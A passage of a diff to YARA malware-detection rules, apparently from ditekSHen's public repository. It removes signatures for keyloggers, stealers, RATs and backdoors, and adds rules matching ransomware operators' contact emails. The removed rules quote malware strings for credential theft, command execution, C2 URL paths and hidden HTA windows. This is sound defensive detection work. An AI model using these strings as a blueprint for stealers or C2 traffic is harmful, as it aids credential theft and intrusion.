wide nocase - $s2 = "GrabAccounts" fullword ascii - $s3 = "DownloadFile" fullword ascii - $s4 = "Internet Explorer Recovery" wide - $s5 = "Outlook Recovery" wide - $s6 = "Thunderbird Recovery" wide - $s7 = "Keylogs -" wide - $s8 = "WebCam_Capture.dll" wide - $s9 = " is not installed on this computer!" wide - $s10 = "cmd /c bfsvc.exe \"" wide - $s11 = "/Keylogs - PC:" fullword wide - $s12 = "/PC:" fullword wide - $s13 = "<p style=\"color:#CC7A00\">[" wide + $s1 = "tochka.director@gmail.com" ascii wide nocase condition: - ( uint16(0)==0x5a4d and 5 of ($s*)) or (6 of ($s*)) + uint16(0)==0x5a4d and any of them } -import "pe" - -rule DITEKSHEN_MALWARE_Win_Aspire : FILE +rule DITEKSHEN_INDICATOR_KB_ID_UNK01 : FILE { meta: - description = "Aspire Keylogger payload" - author = "ditekSHen" - id = "25724975-f373-553e-b27e-43168e956c16" - date = "2024-09-06" - modified = "2024-09-06" + description = "Detects Amadey executables with specific email addresses found in the code signing certificate" + author = "ditekShen" + id = "56e83bfb-e17d-5d27-87fa-e275cc540148" + date = "2024-01-23" + modified = "2024-01-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L1007-L1022" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "3ea0136dbacb79e4c7556f562d17b26b84ac3e4c967b117021e2399ded0a0fdf" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/indicator_knownbad_id.yar#L49-L58" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "d85461f74186fcabcbf7f2bc1dce06b0012c504cf3235a6fc3e1499dc6f8a3ee" score = 75 - quality = 75 + quality = 73 tags = "FILE" + hash1 = "37d08a64868c35c5bae8f5155cc669486590951ea80dd9da61ec38defb89a146" strings: - $s1 = "AspireLogger -" wide - $s2 = "Application: @" wide - $s3 = "encryptedUsername" wide - $s4 = "encryptedPassword" wide - $s5 = "Fetch users fron logins" wide - $s6 = "URI=file:" wide - $s7 = "signons.sqlite" wide - $s8 = "logins.json" wide + $s1 = "etienne@tetracerous.br" ascii wide nocase condition: - ( uint16(0)==0x5a4d and 6 of ($s*)) or (7 of ($s*)) + uint16(0)==0x5a4d and any of them } -import "pe" - -rule DITEKSHEN_MALWARE_Win_S05Kitty : FILE +rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Lockergoga { meta: - description = "Sector05 Kitty RAT payload" - author = "ditekSHen" - id = "3261f6b6-21e7-5195-98db-9607ba530572" - date = "2024-09-06" - modified = "2024-09-06" + description = "Detects files referencing identities associated with LockerGoga ransomware" + author = "ditekShen" + id = "ff257dae-d09b-52b3-93ca-68a560231b0d" + date = "2024-01-23" + modified = "2024-01-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L1024-L1045" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "df2930694671c9ca16f2afeb799704647c9acf32be118706c342347ffe8ceb36" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/indicator_knownbad_id.yar#L60-L80" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "f3474f92d935dda0d4c3b11b6934aede69ed949c8ba4d196bfe320476d39ac36" score = 75 - quality = 75 - tags = "FILE" + quality = 49 + tags = "" strings: - $s1 = "Execute Comand" ascii - $s2 = "InjectExplorer" ascii - $s3 = "targetProcess = %s" fullword ascii - $s4 = "Process attach (%s)" fullword ascii - $s5 = "process name: %s" fullword ascii - $s6 = "cmd /c %s >%s" fullword ascii - $s7 = "CmdDown: %s, failed" fullword ascii - $s8 = "http://%s%s/%s" fullword ascii - $s9 = "tmp.LOG" fullword ascii - $x1 = "zerodll.dll" fullword ascii - $x2 = "OneDll.dll" fullword ascii - $x3 = "kkd.bat" fullword ascii - $x4 = "%s\\regsvr32.exe /s \"%s\"" fullword ascii - $x5 = "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\fontchk.jse" fullword ascii + $s1 = "abbschevis@protonmail.com" nocase ascii wide + $s2 = "aperywsqaroci@o2.pl" nocase ascii wide + $s3 = "asuxidoruraep1999@o2.pl" nocase ascii wide + $s4 = "dharmaparrack@protonmail.com" nocase ascii wide + $s5 = "ijuqodisunovib98@o2.pl" nocase ascii wide + $s6 = "mayarchenot@protonmail.com" nocase ascii wide + $s7 = "mikllimiteds@gmail.com0" nocase ascii wide + $s8 = "phanthavongsaneveyah@protonmail.com" nocase ascii wide + $s9 = "qicifomuejijika@o2.pl" nocase ascii wide + $s10 = "rezawyreedipi1998@o2.pl" nocase ascii wide + $s11 = "sayanwalsworth96@protonmail.com" nocase ascii wide + $s12 = "suzumcpherson@protonmail.com" nocase ascii wide + $s13 = "wyattpettigrew8922555@mail.com" nocase ascii wide condition: - uint16(0)==0x5a4d and (8 of ($s*) or all of ($x*)) + any of them } -import "pe" - -rule DITEKSHEN_MALWARE_Win_Fakewmi : FILE +rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Goldenaxe { meta: - description = "FakeWMI payload" - author = "ditekSHen" - id = "689bc207-2bc6-50de-80d6-d1ba0a26b264" - date = "2024-09-06" - modified = "2024-09-06" + description = "Detects files referencing identities associated with GoldenAxe ransomware" + author = "ditekShen" + id = "cd6486eb-742f-50fb-bd99-c5d778886477" + date = "2024-01-23" + modified = "2024-01-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L1047-L1064" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "627886cdd01f5f02e454ef284c77c87eb027ee33f6a51536758fb7f095271a40" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/indicator_knownbad_id.yar#L82-L91" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "2540da85880dc08b51a2d096cefd8ed3cb14ccd171b71b434ccf26e7c5f1b54b" score = 75 - quality = 75 - tags = "FILE" - clamav_sig = "MALWARE.Win.Trojan.Fakewmi" + quality = 71 + tags = "" strings: - $s1 = "-BEGIN RSA PUBLIC KEY-" ascii - $s2 = ".exe|" ascii - $s3 = "cmd /c wmic " ascii - $s4 = "cmd /c sc " ascii - $s5 = "schtasks" ascii - $s6 = "taskkill" ascii - $s7 = "findstr" ascii - $s8 = "netsh interface" ascii - $s9 = "CreateService" ascii + $s1 = "xxback@keemail.me" nocase ascii wide + $s2 = "darkusmbackup@protonmail.com" nocase ascii wide condition: - uint16(0)==0x5a4d and ( all of ($s*) and #s2>10) + any of them } -import "pe" - -rule DITEKSHEN_MALWARE_Win_Baldr : FILE +rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Getcrypt { meta: - description = "Baldr payload" - author = "ditekSHen" - id = "cdc35a11-a97b-5e21-929e-01fed5172b55" - date = "2024-09-06" - modified = "2024-09-06" + description = "Detects files referencing identities associated with GetCrypt ransomware" + author = "ditekShen" + id = "b5e31968-e626-5fbb-8bfe-942b48737367" + date = "2024-01-23" + modified = "2024-01-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L1066-L1083" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "f8e97fd618209bc6ce609b60b1e1f1e359be7678474fad3b18a529487c64cd99" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/indicator_knownbad_id.yar#L93-L106" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "401f4e69235873adc271f8861912ec17daaa71a798c83df8cc3a9b88520708c9" score = 75 - quality = 73 - tags = "FILE" - clamav_sig = "MALWARE.Win.Trojan.Baldr" + quality = 63 + tags = "" strings: - $x1 = "BALDR VERSION : {0}" fullword wide - $x2 = "Baldr" fullword ascii wide - $x3 = "{0}\\{1:n}.exe" fullword wide - $x4 = ".doc;.docx;.log;.txt;" fullword wide - $s1 = "<GetMAC>b__" ascii - $s2 = "<ExtractPrivateKey3>b__" ascii - $s3 = "UploadData" fullword ascii - $s6 = "get_NetworkInterfaceType" fullword ascii - $s5 = "get_Passwordcheck" fullword ascii + $s1 = "getcrypt@cock.li" nocase ascii wide + $s2 = "cryptget@tutanota.com" nocase ascii wide + $s3 = "cryptget@tutanota.com" nocase ascii wide + $s4 = "offtitan@pm.me" nocase ascii wide + $s5 = "offtitan@cock.li" nocase ascii wide + $s6 = "un42@protonmail.com" nocase ascii wide condition: - ( uint16(0)==0x5a4d and all of ($x*)) or (2 of ($x*) and 4 of ($s*)) + any of them } -import "pe" - -rule DITEKSHEN_MALWARE_Win_Megumin : FILE -{ - meta: - description = "Megumin payload" - author = "ditekSHen" - id = "bb1743f7-0bd8-5c0a-ad78-c4747904204f" - date = "2024-09-06" - modified = "2024-09-06" +rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Cryptomix +{ + meta: + description = "Detects files referencing identities associated with CryptoMix ransomware" + author = "ditekShen" + id = "7e623d06-36e8-576d-b261-d562eccf549b" + date = "2024-01-23" + modified = "2024-01-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L1085-L1108" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "fb4934814c45d2465b6e1589c3b489116343ca0c17ebb916b5c9247fc676c74d" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/indicator_knownbad_id.yar#L108-L123" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "27b75a476229fc877c316f7a61d1ed647f5a67ac44a174d86c084063f039b20c" score = 75 - quality = 50 - tags = "FILE" - clamav_sig = "MALWARE.Win.Trojan.Megumin" + quality = 34 + tags = "" strings: - $s1 = "loadpe|" fullword ascii - $s2 = "Megumin/2.0" fullword ascii - $s3 = "/c start /I \"\" \"" fullword ascii - $s4 = "jsbypass|" fullword ascii - $cnc1 = "Mozilla/5.0 (Windows NT 6.1) Megumin/2.0" fullword ascii - $cnc2 = "/cdn-cgi/l/chk_jschl?s=" fullword ascii - $cnc3 = "/newclip?hwid=" fullword ascii - $cnc4 = "/isClipper" fullword ascii - $cnc5 = "/task?hwid=" fullword ascii - $cnc6 = "/completed?hwid=" fullword ascii - $cnc7 = "/gate?hwid=" fullword ascii - $cnc8 = "/addbot?hwid=" fullword ascii - $pdb = "\\MeguminV2\\Release\\MeguminV2.pdb" ascii + $s1 = "portstatrelea1982@protonmail.om" ascii wide nocase + $s2 = "unlock@eqaltech.su" ascii wide nocase + $s3 = "unlock@royalmail.su" ascii wide nocase + $s4 = "adexsin276@gmail.com" ascii wide nocase + $s5 = "nbactocepnyou@protonmail.com" ascii wide nocase + $s6 = "nunlock@eqaltech.su" ascii wide nocase + $s7 = "nsnlock@royalmail.su" ascii wide nocase + $s8 = "cersiacsofal@protonmail.com" ascii wide nocase condition: - ( uint16(0)==0x5a4d and ( all of ($s*) or 5 of ($cnc*) or $pdb)) or 11 of them + any of them } -import "pe" - -rule DITEKSHEN_MALWARE_Win_Rietspoof : FILE +rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Buran { meta: - description = "Rietspoof payload" - author = "ditekSHen" - id = "b2d94705-ca59-56ae-8471-2c6895d355dc" - date = "2024-09-06" - modified = "2024-09-06" + description = "Detects files referencing identities associated with Buran ransomware" + author = "ditekShen" + id = "63cdda3f-78ed-5ce5-a8e0-e0893f2c314e" + date = "2024-01-23" + modified = "2024-01-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L1110-L1140" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "d1d9baab83c904d1e8dcd7aeacdabfc79c1acee67006793c2240a42ebf9c62b2" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/indicator_knownbad_id.yar#L125-L140" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "685126efa7f90ce296fc616bd8d5d89a5b4b9aba8b60601b29534de21a0d0015" score = 75 - quality = 73 - tags = "FILE" - clamav_sig = "MALWARE.Win.Trojan.Rietspoof" + quality = 59 + tags = "" strings: - $c1 = "%s%s%s USER: user" fullword ascii - $c2 = "cmd /c %s" fullword ascii - $c3 = "CreateObject(\"Scripting.FileSystemObject\").DeleteFile(" ascii - $c4 = "WScript.Quit" fullword ascii - $c5 = "CPU: %s(%d)" fullword ascii - $c6 = "RAM: %lld Mb" fullword ascii - $c7 = "data.dat" fullword ascii - $c8 = "%s%s%s USER:" ascii - $v1_1 = ".vbs" ascii - $v1_2 = "HELLO" ascii - $v1_3 = "Wscript.Sleep" ascii - $v1_4 = "User-agent:Mozilla/5.0 (Windows; U;" ascii - $v2_1 = "Xjoepxt!" ascii - $v2_2 = "Content-MD5:%s" fullword ascii - $v2_3 = "M9h5an8f8zTjnyTwQVh6hYBdYsMqHiAz" fullword ascii - $v2_4 = "GET /%s?%s HTTP/1.1" fullword ascii - $v2_5 = "GET /?%s HTTP/1.1" fullword ascii - $pdb1 = "\\techloader\\loader\\loader.odb" ascii wide - $pdb2 = "\\loader\\Release\\loader_v1.0.pdb" ascii wide + $s1 = "recovery_server@protonmail.com" ascii wide nocase + $s2 = "recovery1server@cock.li" ascii wide nocase + $s3 = "polssh1@protonmail.com" ascii wide nocase + $s4 = "polssh@protonmail.com" ascii wide nocase + $s5 = "buransupport@exploit.im" ascii wide nocase + $s6 = "buransupport@xmpp.jp" ascii wide nocase + $s7 = "jacksteam2018@protonmail.com" ascii wide nocase + $s8 = "notesteam2018@tutanota.com" ascii wide nocase condition: - uint16(0)==0x5a4d and (7 of ($c*) and (3 of ($v*) or 1 of ($pdb*))) + any of them } -import "pe" - -rule DITEKSHEN_MALWARE_Win_Modirat : FILE +rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Ransomwareexx { meta: - description = "MoDiRAT payload" - author = "ditekSHen" - id = "8b641c7a-5ebd-50e7-83cb-e408683c456b" - date = "2024-09-06" - modified = "2024-09-06" + description = "Detects files referencing identities associated with RansomwareEXX Linux ransomware" + author = "ditekShen" + id = "dfcff8cb-c50c-559e-b5b9-8c2cdac7a3dc" + date = "2024-01-23" + modified = "2024-01-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L1142-L1158" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "d0760e9dab7e9c0affb2193ea249feea8bb58e519522ca2a562f015059ad5590" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/indicator_knownbad_id.yar#L142-L150" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "a83ada5d29c6d62a292c4b3a1379558cddcaf63d97dbdfc6afd27cc52f6f656d" score = 75 - quality = 75 - tags = "FILE" + quality = 73 + tags = "" strings: - $s1 = "add_Connected" fullword ascii - $s2 = "Statconnected" fullword ascii - $s3 = "StartConnect" fullword ascii - $s4 = "TelegramTitleDetect" fullword ascii - $s5 = "StartTitleTelegram" fullword ascii - $s6 = "Check_titles" fullword ascii - $s7 = "\\MoDi RAT V" ascii - $s8 = "IsBuzy" fullword ascii - $s9 = "Recording_Time" fullword wide + $s1 = "france.eigs@protonmail.com" ascii wide nocase condition: - ( uint16(0)==0x5a4d and 7 of them ) or all of them + any of them } -import "pe" - -rule DITEKSHEN_MALWARE_DOC_Koadicdoc : FILE +rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Phobos { meta: - description = "Koadic post-exploitation framework document payload" - author = "ditekSHen" - id = "76d6c8df-4e42-5c0a-8344-f8848e7ac945" - date = "2024-09-06" - modified = "2024-09-06" + description = "Detects files referencing identities associated with Phobos ransomware" + author = "ditekShen" + id = "cee09220-4038-5190-b595-28f67c845588" + date = "2024-01-23" + modified = "2024-01-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L1160-L1174" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "9f0538e1faee737a08d403a7f321ce45bdc70b390accfe378ba0d26292509fd7" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/indicator_knownbad_id.yar#L152-L161" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "cf9e163d2315d465afb47bf83f30d5d27e14c4cbbc1c235dcb15b75fb509ba7d" score = 75 - quality = 50 - tags = "FILE" + quality = 71 + tags = "" strings: - $s1 = "&@cls&@set" ascii - $s2 = /:~\d+,1%+/ ascii - $s3 = "Header Char" fullword wide - $s4 = "EMBED Package" ascii - $b1 = ".bat\"%" ascii - $b2 = ".bat');\\\"%" ascii - $b3 = ".bat',%" ascii + $s1 = "helprecover@foxmail.com" ascii wide nocase + $s2 = "recoverhelp2020@thesecure.biz" ascii wide nocase condition: - uint16(0)==0xcfd0 and all of ($s*) and 2 of ($b*) + any of them } -import "pe" - -rule DITEKSHEN_MALWARE_BAT_Koadicbat : FILE +rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Epsilon { meta: - description = "Koadic post-exploitation framework BAT payload" - author = "ditekSHen" - id = "dad7bb32-b1f1-5c6d-89b2-77cc49b5f020" - date = "2024-09-06" - modified = "2024-09-06" + description = "Detects files referencing identities associated with Epsilon ransomware" + author = "ditekShen" + id = "acdeb3b1-872b-5892-9dfe-2e506f767da2" + date = "2024-01-23" + modified = "2024-01-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L1176-L1186" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "1ee6c0189a5111c61af1dbe571524427bff95a7e3907f97ce51d272a8f701cf5" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/indicator_knownbad_id.yar#L163-L171" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "163694ed2ae181764fc6e62027487d183114be35a689dd44d4d9761149df244b" score = 75 - quality = 50 - tags = "FILE" + quality = 73 + tags = "" strings: - $v1_1 = "&@cls&@set" ascii - $v2_1 = { 26 63 6c 73 0d 0a 40 25 } - $m1 = /:~\d+,1%+/ ascii + $s1 = "neftet@tutanota.com" ascii wide nocase condition: - uint16(0)==0xfeff and ((1 of ($v1*) or 1 of ($v2*)) and #m1>100) + any of them } -import "pe" - -rule DITEKSHEN_MALWARE_JS_Koadicjs +rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Thanos { meta: - description = "Koadic post-exploitation framework JS payload" - author = "ditekSHen" - id = "8598d5cb-0486-52b0-a686-6bd014f35c44" - date = "2024-09-06" - modified = "2024-09-06" + description = "Detects files referencing identities associated with Thanos ransomware" + author = "ditekShen" + id = "22ffb4c9-f113-5d3e-a466-6c384c0c6e8a" + date = "2024-01-23" + modified = "2024-01-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L1188-L1208" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "689116f74996fecf4c16c224e8cd842ad5b5e989de2dfdf0debeb9a26d8a12fa" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/indicator_knownbad_id.yar#L173-L182" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "039ea384136a1aaa261702ed75ab9358aaa1ec2d5a8d35fe4789647f39490c7c" score = 75 - quality = 75 + quality = 71 tags = "" strings: - $s1 = "window.moveTo(-" ascii - $s2 = "window.onerror = function(sMsg, sUrl, sLine) { return false; }" fullword ascii - $s3 = "window.onfocus = function() { window.blur(); }" fullword ascii - $s4 = "window.resizeTo(" ascii - $s5 = "window.blur();" fullword ascii - $hf1 = "<hta:application caption=\"no\" windowState=\"minimize\" showInTaskBar=\"no\"" fullword ascii - $hf2 = "<hta:application caption=\"no\" showInTaskBar=\"no\" windowState=\"minimize\" navigable=\"no\" scroll=\"no\"" - $ht1 = "<hta:application" ascii - $ht2 = "caption=\"no\"" ascii - $ht3 = "showInTaskBar=\"no\"" ascii - $ht4 = "windowState=\"minimize\"" ascii - $ht5 = "navigable=\"no\"" ascii - $ht6 = "scroll=\"no\"" ascii + $s1 = "my-contact-email@protonmail.com" ascii wide nocase + $s2 = "get-my-data@protonmail.com" ascii wide nocase condition: - all of ($s*) and (1 of ($hf*) or all of ($ht*)) + any of them } -import "pe" - -rule DITEKSHEN_MALWARE_Win_NETEAGLE : FILE +rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Vovalex { meta: - description = "NETEAGLE backdoor payload" - author = "ditekSHen" - id = "89d1304a-63a0-50fc-855a-2e36cde1c5e7" - date = "2024-09-06" - modified = "2024-09-06" + description = "Detects files referencing identities associated with Vovalex ransomware" + author = "ditekShen" + id = "95e9ddce-8a19-59f1-baf4-bdac61c9c396" + date = "2024-01-23" + modified = "2024-01-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L1210-L1225" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "148de0ca332d3885d94eae8d15eb4aaa2bc4950c691c0e8817c816b7d4c55510" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/indicator_knownbad_id.yar#L184-L192" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "0e8b426e55c1efaf59e5f255f1da9cdfbb509561d3f7ea5baa2815c3131866eb" score = 75 - quality = 75 - tags = "FILE" + quality = 73 + tags = "" strings: - $s1 = "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" fullword ascii - $s2 = "System\\CurrentControlSet\\control\\ComputerName\\ComputerName" fullword ascii - $s3 = "Mozilla/4.0 (compatible; MSIE 5.0; Win32)" fullword ascii - $s4 = "/index.htm" fullword ascii - $s5 = "Help_ME" fullword ascii - $s6 = "GOTO ERROR" ascii - $s7 = "127.0.0.1" fullword ascii - $s8 = /pic\d\.bmp/ ascii wide + $s1 = "vovanandlexus@cock.li" ascii wide nocase condition: - uint16(0)==0x5a4d and 7 of them + any of them } -import "pe" - -rule DITEKSHEN_MALWARE_WIN_BACKSPACE : FILE +rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Alumnilocker { meta: - description = "BACKSPACE backdoor payload" - author = "ditekSHen" - id = "ff9b1c2e-66a1-5e09-8bc2-a7543161e518" - date = "2024-09-06" - modified = "2024-09-06" + description = "Detects files referencing identities associated with AlumniLocker ransomware" + author = "ditekShen" + id = "64b6aff8-3758-5837-b814-e2505a9c12a3" + date = "2024-01-23" + modified = "2024-01-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L1227-L1247" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "3d366327c2272761349687b11e4d6baada5000936dc7f81665e0303f7d1e5121" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/indicator_knownbad_id.yar#L194-L202" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "aeab9cb2b2da246e1863cd1102d901d322017d0b309e852d83e4f66f6e4bdd22" score = 75 - quality = 75 - tags = "FILE" + quality = 73 + tags = "" strings: - $s1 = "Software\\Microsoft\\PnpSetup" ascii wide - $s2 = "Mutex_lnkword_little" ascii wide - $s3 = "(Prxy%c-%s:%u)" fullword ascii - $s4 = "(Prxy-No)" fullword ascii - $s5 = "/index.htm" fullword ascii - $s6 = "CONNECT %s:%d" ascii - $s7 = "\\$NtRecDoc$" fullword ascii - $s8 = "qazWSX123$%^" ascii - $s9 = "Software\\Microsoft\\Core" ascii wide - $s10 = "Mutex_lnkch" ascii wide - $s11 = "Event__lnkch__" ascii wide - $s12 = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)" fullword ascii - $s13 = "User-Agent: Mozilla/5.00 (compatible; MSIE 6.0; Win32)" fullword ascii + $s1 = "alumnilocker@protonmail.com" ascii wide nocase condition: - uint16(0)==0x5a4d and 8 of them + any of them } -import "pe" - -rule DITEKSHEN_MALWARE_Win_Rhttpctrl : FILE +rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Doejocrypt { meta: - description = "RHttpCtrl backdoor payload" - author = "ditekSHen" - id = "fa80db13-90af-5d6a-bcc2-ad1f6808268e" - date = "2024-09-06" - modified = "2024-09-06" + description = "Detects files referencing identities associated with DoejoCrypt ransomware" + author = "ditekShen" + id = "bdf67fd3-8614-52f0-8804-9905f067a848" + date = "2024-01-23" + modified = "2024-01-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L1249-L1265" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "a8b27fcc4636c2fe02a0e006295ece7f705cc9a042921f66ef1f9b6a88aaf9a1" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/indicator_knownbad_id.yar#L204-L213" + license_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/LICENSE.txt" + logic_hash = "b76996ef413d017fa571115f7331154c808fed0f1b1e0c97241cadbbef260a00" score = 75 - quality = 75 - tags = "FILE" + quality = 71 + tags = "" strings: - $s1 = "%d_%04d%02d%02d%02d%02d%02d." ascii - $s2 = "ver=%s&id=%06d&type=" ascii - $s3 = "ver=%d&id=%s&random=%d&" ascii - $s4 = "id=%d&output=%s" ascii - $s5 = "Error:WinHttpCrackUrl failed!/n" ascii - $s6 = "Error:SendRequest failed!/n" ascii - $s7 = ".exe a %s %s" ascii - $s8 = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0" fullword wide - $pdb = "\\WorkSources\\RHttpCtrl\\Server\\Release\\svchost.pdb" ascii + $s1 = "konedieyp@airmail.cc" ascii wide nocase + $s2 = "uenwonken@memail.com" ascii wide nocase condition: - uint16(0)==0x5a4d and (5 of ($s*) or ($pdb and 2 of ($s*))) + any of them } -import "pe" - -rule DITEKSHEN_MALWARE_Win_Pillowmint : FILE +rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Purge { meta: - description = "PillowMint POS payload" - author = "ditekSHen" - id = "e3d26a12-45aa-5f5d-997a-f350bc1bea97" - date = "2024-09-06" - modified = "2024-09-06" + description = "Detects files referencing identities associated with Purge ransomware" + author = "ditekShen" + id = "2a0f2c69-b179-5e48-9db6-be25e329f72b" + date = "2024-01-23" + modified = "2024-01-23" reference = "https://github.com/ditekshen/detection" - source_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/yara/malware.yar#L1267-L1283" - license_url = "https://github.com/ditekshen/detection/blob/5784a5704477b877fb6e2102b49b73a43f350cca/LICENSE.txt" - logic_hash = "ed2597fce1c56d2e110790e0eb89834b1bb9f6f52d39105157c9ffe2ede6cc7a" + source_url = "https://github.com/ditekshen/detection/blob/6bba6f5266a4c203b63da28b647ddb3acbffb8d1/yara/indicator_knownbad_id.yar#L215-L224" + license_url = 